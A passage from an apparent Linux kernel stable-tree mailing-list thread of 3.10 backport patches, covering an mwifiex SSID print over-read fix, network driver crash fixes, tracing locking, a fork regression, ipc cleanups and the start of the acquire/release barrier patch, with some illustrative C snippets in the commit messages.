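follows; format_ssid() is a hypothetical helper written for this
example, not a function from the driver.

```c
#include <stdio.h>
#include <string.h>

/*
 * Format a length-delimited SSID into out. The precision given via
 * "%.*s" caps how many bytes are read from ssid, so no terminating
 * NUL byte is required in the source buffer.
 */
int format_ssid(char *out, size_t outlen,
		const unsigned char *ssid, int ssid_len)
{
	return snprintf(out, outlen, "'%.*s'", ssid_len, (const char *)ssid);
}
```

With a plain "%s" the same call would keep reading past the 32nd octet
until it happened to find a zero byte.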

Fixes: 5e6e3a92b9a4 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <briannorris@chromium.org>
Acked-by: Amitkumar Karwar <akarwar@marvell.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/wireless/mwifiex/cfg80211.c | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/drivers/net/wireless/mwifiex/cfg80211.c b/drivers/net/wireless/mwifiex/cfg80211.c
index e7f7cdf..fa0e45b 100644
--- a/drivers/net/wireless/mwifiex/cfg80211.c
+++ b/drivers/net/wireless/mwifiex/cfg80211.c
@@ -1633,8 +1633,9 @@ done:
 			is_scanning_required = 1;
 		} else {
 			dev_dbg(priv->adapter->dev,
-				"info: trying to associate to '%s' bssid %pM\n",
-				(char *) req_ssid.ssid, bss->bssid);
+				"info: trying to associate to '%.*s' bssid %pM\n",
+				req_ssid.ssid_len, (char *)req_ssid.ssid,
+				bss->bssid);
 			memcpy(&priv->cfg_bssid, bss->bssid, ETH_ALEN);
 			break;
 		}
@@ -1675,8 +1676,8 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev,
 		return -EINVAL;
 	}
 
-	wiphy_dbg(wiphy, "info: Trying to associate to %s and bssid %pM\n",
-		  (char *) sme->ssid, sme->bssid);
+	wiphy_dbg(wiphy, "info: Trying to associate to %.*s and bssid %pM\n",
+		  (int)sme->ssid_len, (char *)sme->ssid, sme->bssid);
 
 	ret = mwifiex_cfg80211_assoc(priv, sme->ssid_len, sme->ssid, sme->bssid,
 				     priv->bss_mode, sme->channel, sme, 0);
@@ -1799,8 +1800,8 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev,
 		goto done;
 	}
 
-	wiphy_dbg(wiphy, "info: trying to join to %s and bssid %pM\n",
-		  (char *) params->ssid, params->bssid);
+	wiphy_dbg(wiphy, "info: trying to join to %.*s and bssid %pM\n",
+		  params->ssid_len, (char *)params->ssid, params->bssid);
 
 	mwifiex_set_ibss_params(priv, params);
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (168 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 271/319] net: sky2: Fix shutdown crash Willy Tarreau
                   ` (48 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eli Cooper, David S . Miller, Willy Tarreau

From: Eli Cooper <elicooper@gmx.com>

commit f4180439109aa720774baafdd798b3234ab1a0d2 upstream.

When xfrm is applied to TSO/GSO packets, it follows this path:

    xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()

where skb_gso_segment() relies on skb->protocol to function properly.

This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.

Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/ip_output.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index 57e7450..5f077ef 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -97,6 +97,9 @@ int __ip_local_out(struct sk_buff *skb)
 
 	iph->tot_len = htons(skb->len);
 	ip_send_check(iph);
+
+	skb->protocol = htons(ETH_P_IP);
+
 	return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, skb, NULL,
 		       skb_dst(skb)->dev, dst_output);
 }
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 271/319] net: sky2: Fix shutdown crash
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (169 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 272/319] kaweth: fix firmware download Willy Tarreau
                   ` (47 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jeremy Linton, David S . Miller, Willy Tarreau

From: Jeremy Linton <jeremy.linton@arm.com>

commit 06ba3b2133dc203e1e9bc36cee7f0839b79a9e8b upstream.

The sky2 frequently crashes during machine shutdown with:

sky2_get_stats+0x60/0x3d8 [sky2]
dev_get_stats+0x68/0xd8
rtnl_fill_stats+0x54/0x140
rtnl_fill_ifinfo+0x46c/0xc68
rtmsg_ifinfo_build_skb+0x7c/0xf0
rtmsg_ifinfo.part.22+0x3c/0x70
rtmsg_ifinfo+0x50/0x5c
netdev_state_change+0x4c/0x58
linkwatch_do_dev+0x50/0x88
__linkwatch_run_queue+0x104/0x1a4
linkwatch_event+0x30/0x3c
process_one_work+0x140/0x3e0
worker_thread+0x60/0x44c
kthread+0xdc/0xf0
ret_from_fork+0x10/0x50

This is caused by the sky2 being called after it has been shut down.
A previous thread about this can be found here:

https://lkml.org/lkml/2016/4/12/410

An alternative fix is to ensure that IFF_UP gets cleared by
calling dev_close() during shutdown. This is similar to what
bnx2/tg3/xgene and maybe others are doing to ensure that the driver
isn't being called following _shutdown().

Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/ethernet/marvell/sky2.c | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/drivers/net/ethernet/marvell/sky2.c b/drivers/net/ethernet/marvell/sky2.c
index d175bbd..4ac9dfd 100644
--- a/drivers/net/ethernet/marvell/sky2.c
+++ b/drivers/net/ethernet/marvell/sky2.c
@@ -5197,6 +5197,19 @@ static SIMPLE_DEV_PM_OPS(sky2_pm_ops, sky2_suspend, sky2_resume);
 
 static void sky2_shutdown(struct pci_dev *pdev)
 {
+	struct sky2_hw *hw = pci_get_drvdata(pdev);
+	int port;
+
+	for (port = 0; port < hw->ports; port++) {
+		struct net_device *ndev = hw->dev[port];
+
+		rtnl_lock();
+		if (netif_running(ndev)) {
+			dev_close(ndev);
+			netif_device_detach(ndev);
+		}
+		rtnl_unlock();
+	}
 	sky2_suspend(&pdev->dev);
 	pci_wake_from_d3(pdev, device_may_wakeup(&pdev->dev));
 	pci_set_power_state(pdev, PCI_D3hot);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 272/319] kaweth: fix firmware download
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (170 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 271/319] net: sky2: Fix shutdown crash Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data Willy Tarreau
                   ` (46 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Oliver Neukum, David S . Miller, Willy Tarreau

From: Oliver Neukum <oneukum@suse.com>

commit 60bcabd080f53561efa9288be45c128feda1a8bb upstream.

This fixes the oops discovered by the Umap2 project and Alan Stern.
The intf member needs to be set before the firmware is downloaded.

Signed-off-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/usb/kaweth.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/net/usb/kaweth.c b/drivers/net/usb/kaweth.c
index afb117c..8ba774d 100644
--- a/drivers/net/usb/kaweth.c
+++ b/drivers/net/usb/kaweth.c
@@ -1031,6 +1031,7 @@ static int kaweth_probe(
 	kaweth = netdev_priv(netdev);
 	kaweth->dev = udev;
 	kaweth->net = netdev;
+	kaweth->intf = intf;
 
 	spin_lock_init(&kaweth->device_lock);
 	init_waitqueue_head(&kaweth->term_wait);
@@ -1141,8 +1142,6 @@ err_fw:
 
 	dev_dbg(dev, "Initializing net device.\n");
 
-	kaweth->intf = intf;
-
 	kaweth->tx_urb = usb_alloc_urb(0, GFP_KERNEL);
 	if (!kaweth->tx_urb)
 		goto err_free_netdev;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (171 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 272/319] kaweth: fix firmware download Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd Willy Tarreau
                   ` (45 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Steven Rostedt (Red Hat), Willy Tarreau

From: "Steven Rostedt (Red Hat)" <rostedt@goodmis.org>

commit 1245800c0f96eb6ebb368593e251d66c01e61022 upstream.

The iter->seq can be reset outside the protection of the mutex. So can
reading of user data. Move the mutex up to the beginning of the function.

Fixes: d7350c3f45694 ("tracing/core: make the read callbacks reentrants")
Reported-by: Al Viro <viro@ZenIV.linux.org.uk>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/trace/trace.c | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
index 4ff36f7..d6e7252 100644
--- a/kernel/trace/trace.c
+++ b/kernel/trace/trace.c
@@ -4121,13 +4121,6 @@ tracing_read_pipe(struct file *filp, char __user *ubuf,
 	struct trace_array *tr = iter->tr;
 	ssize_t sret;
 
-	/* return any leftover data */
-	sret = trace_seq_to_user(&iter->seq, ubuf, cnt);
-	if (sret != -EBUSY)
-		return sret;
-
-	trace_seq_init(&iter->seq);
-
 	/* copy the tracer to avoid using a global lock all around */
 	mutex_lock(&trace_types_lock);
 	if (unlikely(iter->trace->name != tr->current_trace->name))
@@ -4140,6 +4133,14 @@ tracing_read_pipe(struct file *filp, char __user *ubuf,
 	 * is protected.
 	 */
 	mutex_lock(&iter->mutex);
+
+	/* return any leftover data */
+	sret = trace_seq_to_user(&iter->seq, ubuf, cnt);
+	if (sret != -EBUSY)
+		goto out;
+
+	trace_seq_init(&iter->seq);
+
 	if (iter->trace->read) {
 		sret = iter->trace->read(iter, filp, ubuf, cnt, ppos);
 		if (sret)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (172 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 273/319] tracing: Move mutex to protect against resetting of seq data Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
                   ` (44 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Michal Hocko, Roland McGrath, Andreas Schwab, Andrew Morton,
	Linus Torvalds, Willy Tarreau

From: Michal Hocko <mhocko@suse.com>

commit 735f2770a770156100f534646158cb58cb8b2939 upstream.

Commit fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal
exit") has caused a subtle regression in nscd which uses
CLONE_CHILD_CLEARTID to clear the nscd_certainly_running flag in the
shared databases, so that the clients are notified when nscd is
restarted.  Now, when nscd uses a non-persistent database, clients that
have it mapped keep thinking the database is being updated by nscd, when
in fact nscd has created a new (anonymous) one (for non-persistent
databases it uses an unlinked file as backend).

The original proposal for the CLONE_CHILD_CLEARTID change claimed
(https://lkml.org/lkml/2006/10/25/233):

: The NPTL library uses the CLONE_CHILD_CLEARTID flag on clone() syscalls
: on behalf of pthread_create() library calls.  This feature is used to
: request that the kernel clear the thread-id in user space (at an address
: provided in the syscall) when the thread disassociates itself from the
: address space, which is done in mm_release().
:
: Unfortunately, when a multi-threaded process incurs a core dump (such as
: from a SIGSEGV), the core-dumping thread sends SIGKILL signals to all of
: the other threads, which then proceed to clear their user-space tids
: before synchronizing in exit_mm() with the start of core dumping.  This
: misrepresents the state of process's address space at the time of the
: SIGSEGV and makes it more difficult for someone to debug NPTL and glibc
: problems (misleading him/her to conclude that the threads had gone away
: before the fault).
:
: The fix below is to simply avoid the CLONE_CHILD_CLEARTID action if a
: core dump has been initiated.

The resulting patch from Roland (https://lkml.org/lkml/2006/10/26/269)
seems to have a larger scope than the original patch asked for.  It
seems that limiting the scope of the check to core dumping should work
for the SIGSEGV issue described above.

[Changelog partly based on Andreas' description]
Fixes: fec1d0115240 ("[PATCH] Disable CLONE_CHILD_CLEARTID for abnormal exit")
Link: http://lkml.kernel.org/r/1471968749-26173-1-git-send-email-mhocko@kernel.org
Signed-off-by: Michal Hocko <mhocko@suse.com>
Tested-by: William Preston <wpreston@suse.com>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Roland McGrath <roland@hack.frob.com>
Cc: Andreas Schwab <schwab@suse.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/fork.c | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)

diff --git a/kernel/fork.c b/kernel/fork.c
index 2358bd4..612e78d 100644
--- a/kernel/fork.c
+++ b/kernel/fork.c
@@ -775,14 +775,12 @@ void mm_release(struct task_struct *tsk, struct mm_struct *mm)
 	deactivate_mm(tsk, mm);
 
 	/*
-	 * If we're exiting normally, clear a user-space tid field if
-	 * requested.  We leave this alone when dying by signal, to leave
-	 * the value intact in a core dump, and to save the unnecessary
-	 * trouble, say, a killed vfork parent shouldn't touch this mm.
-	 * Userland only wants this done for a sys_exit.
+	 * Signal userspace if we're not exiting with a core dump
+	 * because we want to leave the value intact for debugging
+	 * purposes.
 	 */
 	if (tsk->clear_child_tid) {
-		if (!(tsk->flags & PF_SIGNALED) &&
+		if (!(tsk->signal->flags & SIGNAL_GROUP_COREDUMP) &&
 		    atomic_read(&mm->mm_users) > 1) {
 			/*
 			 * We don't check the error code - if userspace has
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 275/319] ipc: remove use of seq_printf return value
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (173 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 274/319] kernel/fork: fix CLONE_CHILD_CLEARTID regression in nscd Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:49   ` Joe Perches
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release() Willy Tarreau
                   ` (43 subsequent siblings)
  218 siblings, 2 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Joe Perches, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Joe Perches <joe@perches.com>

commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.

The seq_printf return value, because it's frequently misused,
will eventually be converted to void.

See: commit 1f33c41c03da ("seq_file: Rename seq_overflow() to
     seq_has_overflowed() and make public")

Signed-off-by: Joe Perches <joe@perches.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 ipc/msg.c  | 34 ++++++++++++++++++----------------
 ipc/sem.c  | 26 ++++++++++++++------------
 ipc/shm.c  | 42 ++++++++++++++++++++++--------------------
 ipc/util.c |  6 ++++--
 4 files changed, 58 insertions(+), 50 deletions(-)

diff --git a/ipc/msg.c b/ipc/msg.c
index 32aaaab..9ce27d8 100644
--- a/ipc/msg.c
+++ b/ipc/msg.c
@@ -1046,21 +1046,23 @@ static int sysvipc_msg_proc_show(struct seq_file *s, void *it)
 	struct user_namespace *user_ns = seq_user_ns(s);
 	struct msg_queue *msq = it;
 
-	return seq_printf(s,
-			"%10d %10d  %4o  %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
-			msq->q_perm.key,
-			msq->q_perm.id,
-			msq->q_perm.mode,
-			msq->q_cbytes,
-			msq->q_qnum,
-			msq->q_lspid,
-			msq->q_lrpid,
-			from_kuid_munged(user_ns, msq->q_perm.uid),
-			from_kgid_munged(user_ns, msq->q_perm.gid),
-			from_kuid_munged(user_ns, msq->q_perm.cuid),
-			from_kgid_munged(user_ns, msq->q_perm.cgid),
-			msq->q_stime,
-			msq->q_rtime,
-			msq->q_ctime);
+	seq_printf(s,
+		   "%10d %10d  %4o  %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
+		   msq->q_perm.key,
+		   msq->q_perm.id,
+		   msq->q_perm.mode,
+		   msq->q_cbytes,
+		   msq->q_qnum,
+		   msq->q_lspid,
+		   msq->q_lrpid,
+		   from_kuid_munged(user_ns, msq->q_perm.uid),
+		   from_kgid_munged(user_ns, msq->q_perm.gid),
+		   from_kuid_munged(user_ns, msq->q_perm.cuid),
+		   from_kgid_munged(user_ns, msq->q_perm.cgid),
+		   msq->q_stime,
+		   msq->q_rtime,
+		   msq->q_ctime);
+
+	return 0;
 }
 #endif
diff --git a/ipc/sem.c b/ipc/sem.c
index 47a1519..57242be 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -2172,17 +2172,19 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
 
 	sem_otime = get_semotime(sma);
 
-	return seq_printf(s,
-			  "%10d %10d  %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
-			  sma->sem_perm.key,
-			  sma->sem_perm.id,
-			  sma->sem_perm.mode,
-			  sma->sem_nsems,
-			  from_kuid_munged(user_ns, sma->sem_perm.uid),
-			  from_kgid_munged(user_ns, sma->sem_perm.gid),
-			  from_kuid_munged(user_ns, sma->sem_perm.cuid),
-			  from_kgid_munged(user_ns, sma->sem_perm.cgid),
-			  sem_otime,
-			  sma->sem_ctime);
+	seq_printf(s,
+		   "%10d %10d  %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
+		   sma->sem_perm.key,
+		   sma->sem_perm.id,
+		   sma->sem_perm.mode,
+		   sma->sem_nsems,
+		   from_kuid_munged(user_ns, sma->sem_perm.uid),
+		   from_kgid_munged(user_ns, sma->sem_perm.gid),
+		   from_kuid_munged(user_ns, sma->sem_perm.cuid),
+		   from_kgid_munged(user_ns, sma->sem_perm.cgid),
+		   sem_otime,
+		   sma->sem_ctime);
+
+	return 0;
 }
 #endif
diff --git a/ipc/shm.c b/ipc/shm.c
index 08b14f6..1f141c9 100644
--- a/ipc/shm.c
+++ b/ipc/shm.c
@@ -1331,25 +1331,27 @@ static int sysvipc_shm_proc_show(struct seq_file *s, void *it)
 #define SIZE_SPEC "%21lu"
 #endif
 
-	return seq_printf(s,
-			  "%10d %10d  %4o " SIZE_SPEC " %5u %5u  "
-			  "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
-			  SIZE_SPEC " " SIZE_SPEC "\n",
-			  shp->shm_perm.key,
-			  shp->shm_perm.id,
-			  shp->shm_perm.mode,
-			  shp->shm_segsz,
-			  shp->shm_cprid,
-			  shp->shm_lprid,
-			  shp->shm_nattch,
-			  from_kuid_munged(user_ns, shp->shm_perm.uid),
-			  from_kgid_munged(user_ns, shp->shm_perm.gid),
-			  from_kuid_munged(user_ns, shp->shm_perm.cuid),
-			  from_kgid_munged(user_ns, shp->shm_perm.cgid),
-			  shp->shm_atim,
-			  shp->shm_dtim,
-			  shp->shm_ctim,
-			  rss * PAGE_SIZE,
-			  swp * PAGE_SIZE);
+	seq_printf(s,
+		   "%10d %10d  %4o " SIZE_SPEC " %5u %5u  "
+		   "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
+		   SIZE_SPEC " " SIZE_SPEC "\n",
+		   shp->shm_perm.key,
+		   shp->shm_perm.id,
+		   shp->shm_perm.mode,
+		   shp->shm_segsz,
+		   shp->shm_cprid,
+		   shp->shm_lprid,
+		   shp->shm_nattch,
+		   from_kuid_munged(user_ns, shp->shm_perm.uid),
+		   from_kgid_munged(user_ns, shp->shm_perm.gid),
+		   from_kuid_munged(user_ns, shp->shm_perm.cuid),
+		   from_kgid_munged(user_ns, shp->shm_perm.cgid),
+		   shp->shm_atim,
+		   shp->shm_dtim,
+		   shp->shm_ctim,
+		   rss * PAGE_SIZE,
+		   swp * PAGE_SIZE);
+
+	return 0;
 }
 #endif
diff --git a/ipc/util.c b/ipc/util.c
index 7353425..cc10689 100644
--- a/ipc/util.c
+++ b/ipc/util.c
@@ -904,8 +904,10 @@ static int sysvipc_proc_show(struct seq_file *s, void *it)
 	struct ipc_proc_iter *iter = s->private;
 	struct ipc_proc_iface *iface = iter->iface;
 
-	if (it == SEQ_START_TOKEN)
-		return seq_puts(s, iface->header);
+	if (it == SEQ_START_TOKEN) {
+		seq_puts(s, iface->header);
+		return 0;
+	}
 
 	return iface->show(s, it);
 }
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 276/319] arch: Introduce smp_load_acquire(), smp_store_release()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (174 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 275/319] ipc: remove use of seq_printf return value Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-06  8:06   ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 277/319] kernel: Provide READ_ONCE and ASSIGN_ONCE Willy Tarreau
                   ` (42 subsequent siblings)
  218 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Peter Zijlstra, Benjamin Herrenschmidt, Frederic Weisbecker,
	Mathieu Desnoyers, Michael Ellerman, Michael Neuling,
	Russell King, Geert Uytterhoeven, Heiko Carstens, Linus Torvalds,
	Martin Schwidefsky, Victor Kaplansky, Tony Luck, Oleg Nesterov,
	Ingo Molnar, Willy Tarreau

From: Peter Zijlstra <peterz@infradead.org>

commit 47933ad41a86a4a9b50bed7c9b9bd2ba242aac63 upstream

A number of situations currently require the heavyweight smp_mb(),
even though there is no need to order prior stores against later
loads.  Many architectures have much cheaper ways to handle these
situations, but the Linux kernel currently has no portable way
to make use of them.

This commit therefore supplies smp_load_acquire() and
smp_store_release() to remedy this situation.  The new
smp_load_acquire() primitive orders the specified load against
any subsequent reads or writes, while the new smp_store_release()
primitive orders the specified store against any prior reads or
writes.  These primitives allow array-based circular FIFOs to be
implemented without an smp_mb(), and also allow a theoretical
hole in rcu_assign_pointer() to be closed at no additional
expense on most architectures.
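
To illustrate the circular FIFO case, here is a userspace analogue
written with C11 atomics rather than the kernel macros. It assumes a
single producer and a single consumer, and it treats
memory_order_acquire and memory_order_release as rough counterparts of
smp_load_acquire() and smp_store_release(). The names struct ring,
ring_push() and ring_pop() are made up for this sketch.

```c
#include <stdatomic.h>
#include <stdbool.h>

#define RING_SIZE 8	/* must be a power of two */

struct ring {
	int buf[RING_SIZE];
	atomic_uint head;	/* only written by the producer */
	atomic_uint tail;	/* only written by the consumer */
};

void ring_init(struct ring *r)
{
	atomic_init(&r->head, 0);
	atomic_init(&r->tail, 0);
}

/* Producer side: returns false if the ring is full. */
bool ring_push(struct ring *r, int v)
{
	unsigned int head = atomic_load_explicit(&r->head, memory_order_relaxed);
	/* Acquire: the slot is only reused after the consumer has read it. */
	unsigned int tail = atomic_load_explicit(&r->tail, memory_order_acquire);

	if (head - tail == RING_SIZE)
		return false;

	r->buf[head & (RING_SIZE - 1)] = v;
	/* Release: the data store above is ordered before the index update. */
	atomic_store_explicit(&r->head, head + 1, memory_order_release);
	return true;
}

/* Consumer side: returns false if the ring is empty. */
bool ring_pop(struct ring *r, int *v)
{
	unsigned int tail = atomic_load_explicit(&r->tail, memory_order_relaxed);
	/* Acquire: the data read below cannot move before this index load. */
	unsigned int head = atomic_load_explicit(&r->head, memory_order_acquire);

	if (head == tail)
		return false;

	*v = r->buf[tail & (RING_SIZE - 1)];
	/* Release: the data read is complete before the slot is handed back. */
	atomic_store_explicit(&r->tail, tail + 1, memory_order_release);
	return true;
}
```

Neither path needs a full barrier: each side only has to order its own
data access against the index it publishes or observes.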

In addition, the RCU experience transitioning from explicit
smp_read_barrier_depends() and smp_wmb() to rcu_dereference()
and rcu_assign_pointer(), respectively, resulted in substantial
improvements in readability.  It therefore seems likely that
replacing other explicit barriers with smp_load_acquire() and
smp_store_release() will provide similar benefits.  It appears
that roughly half of the explicit barriers in core kernel code
might be so replaced.

[Changelog by PaulMck]

Reviewed-by: "Paul E. McKenney" <paulmck@linux.vnet.ibm.com>
Signed-off-by: Peter Zijlstra <peterz@infradead.org>
Acked-by: Will Deacon <will.deacon@arm.com>
Cc: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Cc: Frederic Weisbecker <fweisbec@gmail.com>
Cc: Mathieu Desnoyers <mathieu.desnoyers@polymtl.ca>
Cc: Michael Ellerman <michael@ellerman.id.au>
Cc: Michael Neuling <mikey@neuling.org>
Cc: Russell King <linux@arm.linux.org.uk>
Cc: Geert Uytterhoeven <geert@linux-m68k.org>
Cc: Heiko Carstens <heiko.carstens@de.ibm.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
Cc: Victor Kaplansky <VICTORK@il.ibm.com>
Cc: Tony Luck <tony.luck@intel.com>
Cc: Oleg Nesterov <oleg@redhat.com>
Link: http://lkml.kernel.org/r/20131213150640.908486364@infradead.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: only backported to support next patch]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/arm/include/asm/barrier.h      | 15 +++++++++++
 arch/arm64/include/asm/barrier.h    | 50 +++++++++++++++++++++++++++++++++++++
 arch/ia64/include/asm/barrier.h     | 23 +++++++++++++++++
 arch/metag/include/asm/barrier.h    | 15 +++++++++++
 arch/mips/include/asm/barrier.h     | 15 +++++++++++
 arch/powerpc/include/asm/barrier.h  | 21 +++++++++++++++-
 arch/s390/include/asm/barrier.h     | 15 +++++++++++
 arch/sparc/include/asm/barrier_64.h | 15 +++++++++++
 arch/x86/include/asm/barrier.h      | 43 ++++++++++++++++++++++++++++++-
 include/asm-generic/barrier.h       | 15 +++++++++++
 include/linux/compiler.h            |  9 +++++++
 11 files changed, 234 insertions(+), 2 deletions(-)

diff --git a/arch/arm/include/asm/barrier.h b/arch/arm/include/asm/barrier.h
index 8dcd9c7..b00ef07 100644
--- a/arch/arm/include/asm/barrier.h
+++ b/arch/arm/include/asm/barrier.h
@@ -59,6 +59,21 @@
 #define smp_wmb()	dmb()
 #endif
 
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
+	typeof(*p) ___p1 = ACCESS_ONCE(*p);				\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	___p1;								\
+})
+
 #define read_barrier_depends()		do { } while(0)
 #define smp_read_barrier_depends()	do { } while(0)
 
diff --git a/arch/arm64/include/asm/barrier.h b/arch/arm64/include/asm/barrier.h
index d4a6333..78e20ba 100644
--- a/arch/arm64/include/asm/barrier.h
+++ b/arch/arm64/include/asm/barrier.h
@@ -35,10 +35,60 @@
 #define smp_mb()	barrier()
 #define smp_rmb()	barrier()
 #define smp_wmb()	barrier()
+
+#define smp_store_release(p, v)						\
+do {									\
+	compiletime_assert_atomic_type(*p);				\
+	smp_mb();							\
+	ACCESS_ONCE(*p) = (v);						\
+} while (0)
+
+#define smp_load_acquire(p)						\
+({									\
